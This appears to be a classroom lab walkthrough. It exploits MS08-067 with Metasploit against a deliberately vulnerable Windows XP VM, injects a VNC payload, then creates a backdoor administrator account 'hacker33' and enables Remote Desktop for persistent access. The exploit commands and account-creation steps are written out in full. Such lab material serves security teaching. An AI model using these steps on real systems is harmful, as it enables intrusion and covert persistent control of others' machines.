Metasploit: MS08-067 - Establishing A VNCShell & rdesktop to Victim Machine

Section 1. Log into Damn Vulnerable WXP-SP2

1. Start Up Damn Vulnerable WXP-SP2.
   • Instructions:
     1. Click on Damn Vulnerable WXP-SP2
     2. Click on Edit virtual machine Settings
   • Note(FYI):
     • For those of you not part of my class, this is a Windows XP machine running SP2.
   • 
2. Edit Virtual Machine Settings
   • Instructions:
     1. Click on Network Adapter
     2. Click on the Bridged Radio button
     3. Click on the OK Button
   • 
3. Play Virtual Machine
   • Instructions:
     1. Click on Damn Vulnerable WXP-SP2
     2. Click on Play virtual machine
   • 
4. Logging into Damn Vulnerable WXP-SP2.
   • Instructions:
     1. Username: administrator
     2. Password: Use the Class Password or whatever you set it.
   • 
5. Open a Command Prompt
   • Instructions:
     1. Start --> All Programs --> Accessories --> Command Prompt
   • 
6. Obtain Damn Vulnerable WXP-SP2's IP Address
   • Instructions:
     1. ipconfig
   • Note(FYI):
     • In my case, Damn Vulnerable WXP-SP2's IP Address 192.168.1.116.
     • This is the IP Address of the Victim Machine that will be attacked by Metasploit.
     • Record your Damn Vulnerable WXP-SP2's IP Address.
   • 

Section 2. Log into BackTrack5

1. Start Up BackTrack5R1.
   • Instructions:
     1. Start Up your VMware Player
     2. Play virtual machine
   • 
2. Login to BackTrack
   • Instructions:
     1. Login: root
     2. Password: toor or <whatever you changed it to>.
   • 
3. Bring up the GNOME
   • Instructions:
     1. Type startx
   • 
4. Start up a terminal window
   • Instructions:
     1. Click on the Terminal Window
   • 
5. Obtain the IP Address
   • Instructions:
     1. ifconfig -a
   • Note(FYI):
     • My IP address 192.168.1.107.  In your case, it will probably be different.
     • This is the machine that will be use to attack the victim machine (Damn Vulnerable WXP-SP2).
   • 

Section 3. Starting up the Metasploit MSF Console

1. Start Up Metasploit msfconsole
   • Instructions:
     1. Applications --> Exploitation Tools --> Network Exploitation Tools --> Metasploit Framework --> msfconsole.
   • Note(FYI):
     • Metasploit takes about 5 to 20 seconds to start up.
   • 
2. msfconsole screen
   • Note(FYI):
     • This is the msfconsole
   • 
3. Search for the MS08-067 Exploit
   • Instructions:
     1. search ms08_067
   • 
4. Use exploit MS08-067 Exploit
   • Instructions:
     1. use exploit/windows/smb/ms08_067_netapi
   • 
5. Show Payloads
   • Instructions:
     1. show payloads
   • 
6. Set Payloads
   • Instructions:
     1. set PAYLOAD windows/vncinject/bind_tcp
     2. Press <Enter>
   • Note:
     • This Payload will create a VNC Server/Shell Using TCP.
   • 
7. Show Options
   • Instructions:
     1. show options
   • Note(FYI):
     • Notice the Required Column.  RPORT and SMBPIPE are already populated, but RHOST is not.
     • In the next step, you will populate RHOST with the IP Address of the victim machine (Damn Vulnerable WXP-SP2).
   • 
8. Set RHOST and Verify
   • Note(FYI):
     • Replace 192.168.1.116 with the IP Address of Damn Vulnerable WXP-SP2 obtained from (Section 1, Step 6).
   • Instructions:
     1. set RHOST 192.168.1.116
     2. show options
        • The Victim's IP Address is now set.
   • 
9. Exploit the Victim Machine
   • Instructions:
     1. exploit
   • Note(FYI):
     • Notice that the vncinject stage was sent to the victim's IP Address.  (See Below).
   • 
10. Verify VNC TCP Connection
    • Instructions:
      1. netstat -nao | findstr :4444
         • In my case, 1052 is the process ID for the VNC Metasploit session.
         • In your case it will be different.
         • Use your PID with the following command.
      2. tasklist | findstr 1052
    • 
11. Create New Attacker Account
    • Instructions:
      1. net user hacker33 abc123 /add
      2. net localgroup administrators hacker33 /add
    • 
12. Open Control Panel
    • Instructions:
      1. Start --> Control Panel
    • 
13. Open System
    • Instructions:
      1. Double Click on System
    • 
14. Allow Remote Desktop
    • Instructions:
      1. Click on the Remote Tab
      2. Check Allow Remote Assistance invitations to be sent from the computer.
      3. Check Allow users to connect remotely to this computer
      4. Click OK
    • 
15. Reboot Damn Vulnerable WXP-SP2
    • Instructions:
      1. shutdown /r
    • Note(FYI):
      • We are going to test the hacker33 account that we just created on Damn Vulnerable WXP-SP2.
    • 
16. Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window
    • 
17. rdesktop to Damn Vulnerable WXP-SP2
    • Note(FYI):
      • Replace 192.168.1.116 with the IP Address of Damn Vulnerable WXP-SP2 obtained from (Section 1, Step 6).
    • Instructions:
      1. Wait until Damn Vulnerable WXP-SP2 has rebooted and is at the login screen
      2. rdesktop -u hacker33 -p abc123 192.168.1.116
    • 
18. Open a Command Prompt
    • Instructions:
      1. Start --> All Programs --> Accessories --> Command Prompt
    • 
19. Set Stronger Password
    • Instructions:
      1. net user hacker33 s0m3t41ng!
    •